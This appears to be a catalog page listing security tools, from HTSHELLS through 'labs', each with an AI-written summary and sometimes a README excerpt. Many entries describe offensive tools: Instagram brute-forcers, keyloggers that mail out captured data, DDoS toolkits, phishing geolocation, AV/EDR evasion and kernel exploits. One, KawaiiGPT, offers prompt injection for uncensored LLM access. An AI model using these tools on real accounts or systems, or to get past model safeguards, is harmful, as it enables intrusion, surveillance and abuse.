AI Summary: HTSHELLS is a toolkit that facilitates the deployment of self-contained web shells and various web-based attack vectors by utilizing .htaccess files. Its primary use case is for penetration testing and exploitation, allowing users to execute commands remotely and conduct denial-of-service, information disclosure, directory traversal, and other attacks through a structured directory of attack modules. Notable features include the ability to generate custom .htaccess files for specific attack types and execute commands via query parameters, enhancing flexibility for security assessments.

HyperDbg

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HyperDbg is an open-source, hypervisor-assisted debugger designed for advanced analysis, fuzzing, and reversing of Windows applications at both user and kernel levels. It leverages modern hardware features like Intel VT-x and EPT, enabling stealthy operation that resists detection by classic anti-debugging techniques, while offering unique capabilities such as hidden hooks and code coverage measurement. This tool is tailored for users with deep low-level system knowledge, providing full control over the operating system for intricate debugging tasks.

I-See-You

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: I-See-You is a Bash and JavaScript tool designed for identifying the precise geographical location of users during social engineering or phishing attempts by utilizing their location coordinates. The tool allows attackers to gather crucial reconnaissance data, facilitating targeted attacks, and functions without requiring any additional software for phishing operations. Users can easily execute the tool by running a script and can modify the appearance of the phishing page to enhance deception.

iaito

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Iaitō is a GUI application developed in Qt and C++ that serves as a frontend for the radare2 reverse engineering framework, specifically targeting users who are not familiar with command-line interfaces. The tool is designed to lower the barrier of entry for new users by providing a more accessible interface, although it is currently in an alpha state and primarily intended for developers. Notable features include cross-platform support for OS X, Linux, and Windows, along with installation requirements for radare2 and Qt.

ida-pro-mcp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The IDA Pro MCP is a simple MCP server designed to facilitate vibe reversing in IDA Pro, allowing users to interact with supported MCP clients for enhanced reverse engineering tasks. Key features include installation support via pip, configuration for various MCP clients, and guidance on prompt engineering to optimize interactions with large language models during the analysis process. This tool is particularly beneficial for users looking to streamline the reverse engineering process using advanced AI techniques in conjunction with traditional analysis tools.

idacode

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IDACode is a Visual Studio Code extension designed to facilitate the execution and debugging of Python scripts within the IDA Pro environment. Notable features include quick script execution, seamless integration with the Python debugger via debugpy, and the ability to run scripts without modifications directly from IDA. The tool supports features like “Execute on save” for automatic script execution and has been tested for compatibility with IDA versions 8.4/9.0 and Python 3.12 on both Windows and macOS.

ighack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ighack is a Bash-based tool designed for testing the password strength of Instagram accounts through brute-force attacks, compatible with both rooted and non-rooted Android devices using Termux. It offers features such as a stable Instagram API, support for Tor to enhance anonymity during attacks, and both auto and manual attack options for user flexibility. The tool is maintained and provides a beginner-friendly interface, allowing easy installation and usage.

ignorant

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ignorant is a tool designed to check the presence of a phone number across various platforms, such as Snapchat and Instagram, without alerting the target. Its primary use case is to facilitate user verification linked to phone numbers for security assessments, while notable features include support for asynchronous operations, rate limiting detection, and integration with multiple modules for different websites.

README

Ignorant

👋 Hi there! For any professional inquiries or collaborations, please reach out to me at: megadose@protonmail.com

iKy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: iKy is a cybersecurity tool designed to collect and display information related to email addresses through an intuitive visual interface. It integrates multiple modules such as FullContact, LinkedIn, and HaveIBeenPwned, allowing users to gather diverse data points about email owners, enhancing the reconnaissance process in cybersecurity investigations. The tool leverages technologies like Flask for the interface, Redis for storage, and is deployable via Docker, ensuring robust performance and ease of use.

Il2CppDumper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Il2CppDumper is a reverse engineering tool specifically designed for Unity games that utilize the il2cpp scripting backend, allowing users to extract and analyze game assets such as MonoBehaviour and MonoScript. It supports a variety of binary formats (ELF, Mach-O, PE, etc.) and versions of Unity (5.3 to 2022.2), while also generating scripts compatible with analysis tools like IDA, Ghidra, and Binary Ninja to facilitate in-depth examination of il2cpp files. Notably, it offers functionalities for bypassing simple protections and generating comprehensive DLL restorations and structure header files.

imessage-exporter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The imessage-exporter is a versatile tool for exporting, managing, and diagnosing iMessage data, providing both library and binary functionalities. It facilitates the saving and archiving of message history, including multimedia content, into open formats, while also supporting migration and compliance with data retention policies. Notable features include cross-platform support, extensive compatibility with iMessage functionalities, and diagnostic tools to ensure the integrity of the iMessage database.

README

imessage-exporter

This crate provides both a library to interact with iMessage data as well as a binary that can perform some useful read-only operations using that data. The aim of this project is to provide the most comprehensive and accurate representation of iMessage data available.

Impulse

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Impulse is a modern denial-of-service toolkit designed for executing various DDoS attack methods, including SMS, email, and multiple network traffic overload techniques like SYN and UDP floods. Its notable features include a user-friendly interface and support for methods such as Slowloris and NTP amplification, allowing attackers to exploit vulnerabilities across multiple platforms including Windows, Linux, and Termux. This tool can be leveraged to stress test and demonstrate the potential impact of denial-of-service attacks on targeted systems.

inceptor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Inceptor is a Windows-focused penetration testing tool designed to automate the bypassing of anti-virus (AV) and endpoint detection and response (EDR) solutions. It features a template-based PE packer that allows extensive user customization and integrates various encoding methods for encoding, compressing, or encrypting shellcode. Notably, Inceptor supports transformations of existing binaries into shellcode and distinguishes between loader-independent and loader-dependent encoders to enhance payload obfuscation and evade detection.

README

:triangular_flag_on_post: This is the public repository of Inceptor, for latest version and updates please consider supporting us through https://porchetta.industries/

infoooze

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Infoooze is an OSINT tool designed for efficient information gathering on targets such as websites, IP addresses, and usernames through a command-line interface. Notable features include various reconnaissance capabilities like subdomain scanning, Whois lookups, and automatic results saving to text files, facilitating streamlined data collection. Additionally, it supports multiple operating systems, including Linux, Windows, and Termux.

README

Infoooze

Report Bug · Request Feature

Table of Content

About Infoooze
- Features
- Support
Getting Started
Usage
- Options
- Examples
Run in Gitpod
Contributing
License
Contact

About Infoooze

Infoooze is a powerful and user-friendly OSINT (Open-Source Intelligence) tool that allows you to quickly and easily gather information about a specific target. With Infoooze, you can easily search for information about websites, IP addresses, usernames, and more, all from the convenience of a simple command-line interface.

Information_Collection_Handbook

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Information Collection Handbook is a comprehensive resource designed for penetration testers, focusing on effective information gathering techniques essential for vulnerability exploitation. It consolidates various methods and tools for domain and subdomain information collection, including online services, browser plugins, and advanced querying techniques, thereby enabling security professionals to uncover assets and vulnerabilities that may otherwise remain hidden. Notable features include detailed sections on Whois queries, DNS historical analysis, and strategies for bypassing content delivery networks (CDNs) to uncover real IP addresses.

Infosec_Reference

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The InfoSec Reference project serves as a comprehensive resource for individuals seeking to enhance their understanding of Information Security, offering a curated list of techniques, tools, and tactics. Its primary use case revolves around providing a “Yellow Pages” style reference for users to browse and learn about various aspects of infosec, helping them build skills and recall pertinent information. Notably, it encourages community contributions and maintains regular updates, while emphasizing a commitment to ethical practices in cybersecurity.

inql

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: InQL is an open-source Burp Suite extension tailored for advanced GraphQL testing, enabling security professionals to effectively identify vulnerabilities within GraphQL APIs. It features a user-friendly interface, robust query manipulation capabilities, and integration with Burp’s existing tools, significantly enhancing the testing process for GraphQL applications.

README

InQL v6.1.2 - Burp Extension for Advanced GraphQL Testing

insta-hack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Insta-hack is a comprehensive tool designed for Instagram account compromise, featuring capabilities for information gathering, brute force attacks, and automated reporting. It operates on both Termux and Kali Linux without the need for root access and includes essential functionalities such as script updates and removals. The tool is intended strictly for educational use, with a clear emphasis on responsible usage.

README

About tool

All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)

Instabruteforce

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Instabruteforce is a Python-based tool designed for brute-forcing Instagram accounts using a list of proxies. Its primary use case is to test account security by attempting to crack passwords from a supplied list, with features that include proxy management, statistics tracking, and customizable bot modes for varying performance. The program also incorporates a pruning system to optimize proxy usage by removing underperforming proxies from its database.

README

Instagram Bruter

This program will brute force any Instagram account you send it its way given a list of proxies.

instagram_monitor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Instagram Monitor is a comprehensive OSINT tool designed for real-time tracking of Instagram activities, including post updates, follower changes, and profile modifications. Key features include interactive dashboards, anonymous media downloads, smart notifications via multiple channels, and enhanced privacy settings to simulate human behavior and avoid detection. This tool effectively provides insights into user engagement and media management, making it vital for social media analysts.

README

instagram_monitor

Instagram-Hacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Instagram-Hacker is a Python script designed for performing bruteforce attacks on Instagram accounts. Its primary use case is to automate the process of testing multiple password combinations for a given username using predefined password lists. Notable features include the requirement for the mechanize and requests libraries, and the option to integrate with Tor for enhanced anonymity during the attack process.

README

Instagram-Hacker

This is a script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!

InstagramPrivSniffer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: InstagramPrivSniffer is a digital investigation tool designed for accessing and analyzing posts from private Instagram accounts that are made visible through collaborations with public accounts. Notable features include the ability to download and view media from these private accounts, serving primarily as an OSINT resource for cybersecurity professionals. The tool is intended strictly for educational and research purposes, and its use should be approached with legal considerations in mind.

instahack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Instahack is a robust brute-force framework designed for testing Instagram accounts, utilizing Bash and Python for efficient password testing. It features multi-threading, Tor integration for anonymity, and customizable attack options, enabling users to conduct ethical penetration testing and OSINT gathering. The tool supports auto-resume capabilities and is optimized for high-volume password attempts.

README

🚀 Instahack - Advanced Instagram Brute Force Framework

🔍 About Instahack

Instahack is a high-performance Instagram brute-force tool crafted in Bash and Python, capable of testing millions of passwords efficiently. It uses Tor routing, Instagram Android app signatures, and customizable attack logic for stealthy, anonymous operations.

instaloader

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Instaloader is a command-line tool designed for downloading media from Instagram profiles, including photos, videos, stories, comments, and geotags. It supports both public and private profiles, offers features for handling profile name changes, and includes options for filtering and customizing download locations. Additionally, it allows users to efficiently update local copies of profiles and preserves session cookies for seamless access to private content.

README

.. image:: https://raw.githubusercontent.com/instaloader/instaloader/master/docs/logo_heading.png

.. badges-start

Interlace

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Interlace is a command-line tool designed to enhance single-threaded applications by enabling multi-threading capabilities, specifically for penetration testing and bug bounty workflows. It supports CIDR and glob notation for target specification and allows users to define multiple parameters such as timeouts, threads, and various command options, facilitating efficient execution across various targets. Notable features include the ability to pipe target lists, utilize multiple proxies, and specify complex command files for diverse testing scenarios.

inventory

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Inventory is a tool designed for attack surface management of public bug bounty programs, aggregating DNS and web server data from over 800 organizations. Its primary use case is to assist bug bounty hunters in efficiently identifying and monitoring new assets while providing security teams with enhanced visibility into their assets. Notable features include automated data collection and transformation from multiple sources, duplicate program merging, and both passive and active enumeration workflows for comprehensive reconnaissance.

iOS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The iOS/macOS penetration testing cheatsheet provides a curated list of tools and resources for conducting security assessments on iOS and macOS applications, including utilities for static analysis, obfuscation, and jailbreak checks. Notable features include links to tools such as MobSF, Frida, and Objection, facilitating the testing of application vulnerabilities across platforms. This repository serves as a comprehensive guide for security professionals looking to enhance their penetration testing workflows on Apple devices.

IP-Tracer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IP-Tracer is a command-line tool designed for Termux and Linux systems that allows users to track IP addresses by retrieving detailed information through the ip-api service. Its primary use case includes identifying the geographic and network details of both the user’s own IP address and that of other targets, with straightforward command syntax for operation. Notable features include installation ease, simple command-based usage, and the ability to gather IP data quickly.

IPA

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Interactive PDF Analysis (IPA) is a graphical tool designed for researchers to deeply explore and analyze the contents of PDF files, particularly focusing on suspicious or potentially malicious documents. Key features include metadata extraction, structural examination of PDF objects, visualization of object references, and the ability to salvage information from corrupted files, all without requiring external dependencies. The tool aims to enhance user experience compared to traditional command-line analysis methods, facilitating a clearer understanding of the relationships among various document elements.

IPAPatch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IPAPatch is a tool designed for patching iOS applications without the need for jailbreaking, enabling developers to inject custom code into third-party IPA files. Key features include the ability to debug applications using lldb, link external frameworks seamlessly, and generate modified distributable IPA files, allowing easy sharing of customized applications. This tool is particularly useful for developers looking to manipulate app behavior or integrate additional functionality within existing iOS apps.

ipdrone

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ipdrone is a Python-based tool designed for IP lookup and geolocation tracking, intended for use on both rooted and non-rooted Android devices via Termux. Notable features include real-time location tracking, ease of use for beginners, and consistent updates, enabling users to gather detailed information about specific IP addresses.

README

ABOUT TOOL :

Ipdrone is a simply python script, which can be used to Ip lookup and to get information of perticualr target Ip. This tool works on both rooted Android device and Non-rooted Android device.

IpHack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IpHack is a Python-based tool designed for tracking IP locations and performing network testing. Its primary use case includes determining the geographical location of IP addresses, checking proxy status, and gathering detailed device information based on IP, with notable features such as an enhanced design, the ability to search for IPs behind Cloudflare, and various inquiry methods for making requests. The tool can be easily installed via pip and offers functionalities to track both direct IP addresses and domains, as well as to verify proxies.

ipranges

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IPRanges is a tool that compiles and lists the IP address ranges for various cloud services and platforms, including Google, Amazon, Microsoft, and others. It provides separate text files for IPv4 and IPv6 addresses, categorized into unmerged and merged formats for efficiency. The dataset is updated daily and sourced from publicly available information, making it useful for network management and security configurations.

README

IPRanges

List all IP ranges from: Google (Cloud & GoogleBot), Bing (Bingbot), Amazon (AWS), Microsoft, Oracle (Cloud), DigitalOcean, GitHub, Facebook (Meta), Twitter, Linode, Telegram, OpenAI (GPTBot), CloudFlare, Vultr, Apple (Private Relay) and ProtonVPN with daily updates.

ivre

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: IVRE (Instrument de veille sur les réseaux extérieurs) is a comprehensive network reconnaissance framework designed for both passive and active reconnaissance. It integrates multiple data sources and tools such as Zeek, Nmap, and Masscan, enabling users to gather extensive information about networks efficiently. Notable features include a web interface for data visualization, support for various database backends, and a modular architecture that allows for easy integration of additional tools.

jadx-ai-mcp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: JADX-AI-MCP is a fully automated server and plugin designed for analyzing Android APK files via large language models (LLMs) such as Claude, enabling efficient vulnerability discovery, APK analysis, and reverse engineering. Key features include seamless MCC communication and integration with powerful LLMs to enhance static analysis and security assessments within the Android development ecosystem.

README

JADX-AI-MCP (Part of Zin MCP Suite)

⚡ Fully automated MCP server + JADX plugin built to communicate with LLM through MCP to analyze Android APKs using LLMs like Claude — uncover vulnerabilities, analyze APK, and reverse engineer effortlessly.

jaeles

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Jaeles is a robust and extensible web application scanning framework developed in Go, designed to facilitate the creation of customized scanners for identifying vulnerabilities. Its primary use case is in the security assessment of web applications, featuring capabilities such as signature-based scanning, integration with Burp Suite, and extensive reporting options. Notable features include the ability to scan multiple URLs concurrently, customizable signature definitions, and Docker support for streamlined deployment.

jak-project

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Jak Project is a tool designed to port the original Jak and Daxter trilogy from PS2 to PC by decompiling the game’s custom LISP language, GOAL, into a human-readable format. It features the development of a custom GOAL compiler for x86-64 architecture, along with tools to extract and modify game assets, ensuring high performance and compatibility with the original game’s mechanics, including live code modification during runtime. Users must have a legally obtained copy of the game, as the project does not include game assets.

Java-Deserialization-Cheat-Sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Java-Deserialization-Cheat-Sheet is a comprehensive resource designed for penetration testers and researchers focusing on deserialization vulnerabilities across various Java serialization libraries. It provides an extensive overview, including payload generators, exploit techniques, detection methods, and protection strategies across multiple serialization frameworks such as XStream, Jackson, and Kryo. Notably, the repository consolidates critical information and references, aiding professionals in identifying and exploiting Java deserialization weaknesses effectively.

README

Java-Deserialization-Cheat-Sheet

A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries.

JByteMod-Beta

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: JByteMod-Beta is a multifunctional bytecode editor designed for manipulating Java bytecode with features such as syntax highlighting, live decompiling, and method graphing. Its primary use case is for developers seeking to analyze and edit Java .jar or .class files efficiently. Notable features include a plugin architecture for extending functionality, integration with popular decompilers like Procyon and Fernflower, and a user-friendly command-line interface.

README

JByteMod-Beta

JByteMod is a multifunctional bytecode editor with syntax highlighting and live decompiling and method graphing. The successor of JByteMod: https://github.com/GraxCode/Cafebabe

jexboss

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: JexBoss is a tool designed to test and exploit Java deserialization vulnerabilities primarily in JBoss Application Server and other Java platforms. It supports versions 3 to 6 of JBoss and is effective against a variety of frameworks and applications, utilizing exploitation vectors such as admin and JMX consoles, servlet deserialization, and specific vulnerabilities like CVE-2017-5638. Notable features include easy installation, support for multiple target applications, and demonstration videos for practical use cases.

JNDI-Injection-Exploit-Plus

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: JNDI-Injection-Exploit-Plus is a comprehensive tool designed for generating operational JNDI links, facilitating background services with RMI, LDAP, and HTTP servers to test vulnerabilities effectively. It enhances the functionality of standard JNDI exploit tools by offering additional remote and local reference gadgets, support for multiple JDK versions, and the capability to create base64 and hex payloads, making it a robust resource for security testing. With over 75 deserialization gadgets included, it provides a diverse set of options for vulnerability assessments.

jnitrace

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: jnitrace is a dynamic analysis tool designed to trace the usage of the JNI API in Android applications, leveraging the Frida framework for real-time monitoring. It simplifies the tracking of native library interactions, offering features such as customizable filtering options for method tracing, backtrace configuration, and the ability to save output in JSON format for further analysis. This tool enhances the reverse engineering process, making it more efficient by reducing the manual effort required to analyze JNI calls.

jok3r

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Jok3r is a Python CLI application designed to assist penetration testers in executing automated network infrastructure and web security assessments. With over 50 integrated open-source tools, it streamlines vulnerability identification through context-aware checks, CVE lookups, and brute force attacks, all packaged within a Docker image for ease of use and customization. Notable features include automatic service fingerprinting, a comprehensive library of security checks for various network services, and automated post-authentication testing.

joomscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OWASP JoomScan is an open-source vulnerability scanning tool designed specifically for Joomla CMS deployments, enabling automated detection of vulnerabilities and misconfigurations that could be exploited by attackers. Developed in Perl, it features a lightweight, modular architecture and provides a user-friendly interface with comprehensive reporting capabilities in both text and HTML formats. Notable features include component enumeration, version checks, firewall detection, and the ability to compile detailed reports to assist administrators in maintaining system security.

jsql-injection

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: jSQL Injection is a lightweight, open-source tool designed for identifying database information from servers, optimized for penetration testing. It is cross-platform, supporting Windows, Linux, and Mac with Java compatibility from versions 21 to 25, and is integrated into various security-focused distributions such as Kali Linux. Notable features include a user-friendly interface, support for multiple database engines, and comprehensive testing functionalities, making it suitable for both novice and experienced security analysts.

juice-shop

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OWASP Juice Shop is a deliberately insecure web application designed for educational purposes such as security training, demonstrations, and Capture The Flag (CTF) events. It contains a wide range of vulnerabilities that align with the OWASP Top Ten, making it an effective tool for testing security tools and techniques. Notable features include its modern architecture, comprehensive vulnerability exposure, and support for various installation methods, including Docker and Vagrant.

juicy-potato

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Juicy Potato is a Local Privilege Escalation tool designed to exploit COM servers for escalating privileges from Windows Service Accounts to NT AUTHORITY\SYSTEM. Notable features include customizable CLSID targeting, flexible COM listening configurations (IP and port), and multiple process creation modes, enabling users to launch executables or scripts with different impersonation privileges. This tool is particularly effective for users with SeImpersonate or SeAssignPrimaryToken privileges, allowing them to bypass security mechanisms on Windows systems.

JustTryHarder

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: JustTryHarder is a comprehensive cheat sheet designed to assist users in navigating the Penetration Testing with Kali Linux (PWK) course and preparing for the Offensive Security Certified Professional (OSCP) exam. It consolidates various penetration testing techniques, such as OS detection, privilege escalation, and exploitation methods, while providing clear examples and references. Notable features include a wide array of topics that cover essential hacking methodologies and tools, making it a valuable resource for both beginners and experienced practitioners in the cybersecurity field.

K8tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: K8tools is a collection of security research and penetration testing tools designed for use in various environments, including remote command execution and web shells. Notably, these tools are modified to enhance compatibility and stability, catering to security professionals who require reliable functionalities. The repository serves as a hub for downloading tools, accessing documentation, and submitting feedback for continuous improvement.

README

K8tools

声明: 工具仅供安全研究或授权渗透，非法用途后果自负。
下载: https://github.com/k8gege/K8tools
文档: http://k8gege.org/p/72f1fea6.html

karma_v2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Karma v2 is a passive open-source intelligence (OSINT) automated reconnaissance framework designed for information security researchers, penetration testers, and bug hunters to gather extensive details about target systems. It integrates with the Shodan Premium API to perform a variety of scans including SSL certificate verification, vulnerability detection, and asset discovery, and it features capabilities like fetching IP banners and interesting leaks across numerous protocols and services. The tool’s output can be displayed in the terminal and saved to files for further analysis.

KawaiiGPT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KawaiiGPT is an open-source command-line tool that provides seamless access to various large language models, including DeepSeek, Gemini, and Kimi-K2, through a reverse-engineered Pollinations API without the need for API keys. It features integrated prompt injection capabilities for security research, allowing for uncensored model access and red-team evaluations, along with native support for Linux and Termux, and a user-friendly console interface. Notably, it offers easy configuration options and a streamlined installation process via a single command.

kb

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: kb is a minimalist knowledge base manager designed for efficient organization and retrieval of information artifacts. It supports functionalities such as adding, viewing, editing, and deleting artifacts, alongside advanced searching options including grep capabilities and template management for better categorization. Notably, it allows for easy import/export of knowledge bases and integrates seamlessly with multiple installation methods, enhancing its usability for various platforms.

README

kb. A minimalist knowledge base manager

kernel-exploits

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The bcoles/kernel-exploits repository provides various updated local root exploit implementations targeting vulnerabilities in the Linux kernel, specifically those identified by their CVEs. Each exploit enables privilege escalation through vulnerabilities such as improper memory handling or mismanaged user namespaces, allowing attackers to gain root access under certain conditions. Notable features include detailed exploit descriptions and references to original sources for further investigation.

README

Kernel Exploits

Various kernel exploits

CVE-2021-22555

Linux local root exploit.

kernel-exploits

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The xairy/kernel-exploits repository contains a collection of Linux kernel exploit code samples for various vulnerabilities, primarily focusing on local privilege escalation (LPE) and information leak scenarios. Each entry is associated with specific Common Vulnerabilities and Exposures (CVEs), detailing the exploit’s impact and vector, enhancing understanding and mitigation strategies for kernel security vulnerabilities. Notable features include the absence of licensing, making the code freely available for educational and research purposes.

kernelpwn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The kernelpwn repository serves as a comprehensive resource for Capture The Flag (CTF) challenges focused on kernel exploitation, providing both challenge write-ups and educational material for beginners in the field. It features a collection of solved kernel-pwn challenges with detailed write-ups, covering various complex exploitation techniques such as SMEP, SMAP, KPTI, and KASLR bypasses. Notable features include a focus on both kernel and non-userland vulnerabilities, as well as an invitation for community contributions to enhance the repository’s challenge offerings.

keychain

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Keychain is a tool designed to manage SSH and GPG keys efficiently by serving as a persistent frontend to ssh-agent and gpg-agent, allowing a single long-running instance per system. Its primary use case is to minimize the frequency of passphrase entries to once per reboot, enhancing security and convenience, especially for remote cron jobs. Notable features include seamless integration with key management, bash completion support for various command-line options, and user-friendly installation procedures.

Keylogger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Keylogger is a lightweight, open-source tool developed in Visual C++ for educational purposes, designed to monitor system activity by capturing keystrokes, mouse clicks, and periodic screenshots in stealth mode. Its notable features include FTP integration for automatic log uploads, the ability to run unnoticed in the background, and persistence through auto-start and auto-copy mechanisms. The tool emphasizes ethical use, warning against unauthorized application.

README

Keylogger

Please don’t forget to give us a ⭐ if you find this project useful!

Keylogger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Keylogger tool captures keyboard, mouse, screenshot, and microphone inputs on a target computer and sends the collected data to the user’s email for security testing purposes. Notable features include self-deletion capabilities if the target discovers the code and automated data transmission every 10 seconds. The tool is easy to deploy by running a single script with minimal setup requirements.

README

Inputs To Mail.

Get Keyboard,Mouse,ScreenShot,Microphone Inputs and Send to your Mail. Purpose of the project is testing the security of information systems

Keylogger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Keylogger is a lightweight multi-platform tool designed to record keystrokes on Windows, Linux, and Mac OS, saving them to a local log file. Its primary use case includes personal monitoring for computer security and self-analysis, with notable features such as the ability to run in both visible and invisible modes on Windows, and a straightforward installation process across all supported operating systems.

README

A simple keylogger for Windows, Linux and Mac

keypatch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Keypatch is a plugin for IDA Pro that integrates the Keystone Assembler Engine, providing enhancements for binary patching during reverse engineering tasks. It features a Patcher for direct assembly input, a Fill Range tool, and a Search utility to locate assembly instructions within binaries. With support for multiple architectures and platforms, an event-driven UI for automated updates, and user-friendly options like automatic comments and undo functionality, Keypatch addresses the limitations of IDA’s built-in assembler while streamlining the reverse engineering process.

keystone

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Keystone is a lightweight and versatile multi-platform assembler framework supporting various architectures including Arm, RISC-V, and X86, among others. It features a clean architecture-neutral API, is thread-safe, and provides bindings for multiple programming languages, making it an ideal tool for developers needing assembly capabilities across different environments. Built on LLVM, Keystone enhances functionality and offers open-source licensing options suitable for both personal and commercial use.

README

Keystone Engine

kics

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KICS (Keeping Infrastructure as Code Secure) is an open-source tool designed to identify security vulnerabilities, compliance issues, and infrastructure misconfigurations in infrastructure-as-code early in the development cycle. It supports various platforms and offers a comprehensive set of queries for thorough analysis, making it essential for maintaining security in cloud-native projects. Notable features include its integration capabilities and extensive documentation for ease of use, enhancing security throughout the software development lifecycle.

killshot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KillShot is a comprehensive penetration testing framework designed for information gathering and website vulnerability scanning. Its primary use case involves automating data collection through integrated tools such as WhatWeb and Nmap, while offering features like a CMS Exploit Scanner and web application vulnerability assessments, including XSS and SQL injection detection. The framework also facilitates backdoor generation and includes a fuzzer, making it a versatile tool for security professionals.

krane

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Krane is a Kubernetes RBAC static analysis tool designed to identify security risks within K8s RBAC configurations and provide mitigation suggestions. Key features include a customizable set of built-in and user-defined risk rules, a user-friendly dashboard for visualizing RBAC posture, continuous analysis capabilities within clusters, and integration with Slack for alerting on significant risks. Additionally, Krane offers reporting in machine-readable formats and can be deployed locally, within CI/CD pipelines, or as a standalone service.

KsDumper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KsDumper is a kernel driver-based tool that enables the dumping of process memory for both x86 and x64 applications, particularly those protected by anti-cheat mechanisms such as EasyAntiCheat. It allows users to bypass restrictions on handle access by directly interfacing with the Windows kernel, facilitating the analysis of packed and protected game internals. Notable features include the ability to rebuild PE32/PE64 headers and sections, although it does not reconstruct the import table, making it primarily suited for reverse engineering and educational purposes.

ksm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KSM is a lightweight x64 hypervisor designed for Intel processors that functions primarily as an extra layer of protection for existing operating systems, rather than running other OS instances. Notable features include a self-contained physical memory introspection engine, userspace physical memory virtualization, IDT shadowing, and experimental support for nesting and APIC virtualization. It is compatible with both Windows and Linux kernels, making it suitable for security applications such as anti-virus and sandboxing.

KubeHound

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: KubeHound is a Kubernetes attack graph tool designed to automatically calculate attack paths between assets within a cluster. It enables users to query and analyze security vulnerabilities through a graph-based representation of their Kubernetes environment, utilizing the Gremlin query language for advanced data exploration. Notable features include compatibility with Docker and Docker Compose, deployment as a service (KHaaS), and integration with graph query UIs, including a Jupyter notebook for user-friendly interaction with the attack graph data.

kubernetes-goat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Kubernetes Goat is an intentionally vulnerable Kubernetes cluster environment designed for the purpose of learning and practicing Kubernetes security. It provides various scenarios for security testing, including exploitation of sensitive keys, SSRF vulnerabilities, and container escapes, thereby enabling users to gain hands-on experience with real-world security challenges in Kubernetes. The tool requires administrative access to a Kubernetes cluster and facilitates setup using kubectl and helm, offering a structured learning path for security professionals.

kubestriker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Kubestriker is a robust security auditing tool designed specifically for Kubernetes environments, facilitating the identification and mitigation of misconfigurations that may expose clusters to attacks. It offers extensive checks across multiple platforms, including self-hosted Kubernetes, Amazon EKS, Azure AKS, and Google GKE, alongside visualized attack path analytics to enhance situational awareness. Additionally, Kubestriker supports CI/CD pipeline integrations, enabling continuous security scanning during the deployment process.

README

A Blazing fast Security Auditing tool for kubernetes!!

labs

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The nixawk/labs repository serves as a catalog of documented vulnerabilities, specifically Common Vulnerabilities and Exposures (CVEs), across various software systems, tools, and devices. The primary use case is to provide security professionals with a reference for known vulnerabilities and their implications, enhancing awareness and response strategies regarding potential exploits. Notable features include detailed entries for each CVE, outlining affected systems and specific attack vectors for exploitation.

README

Name	Description
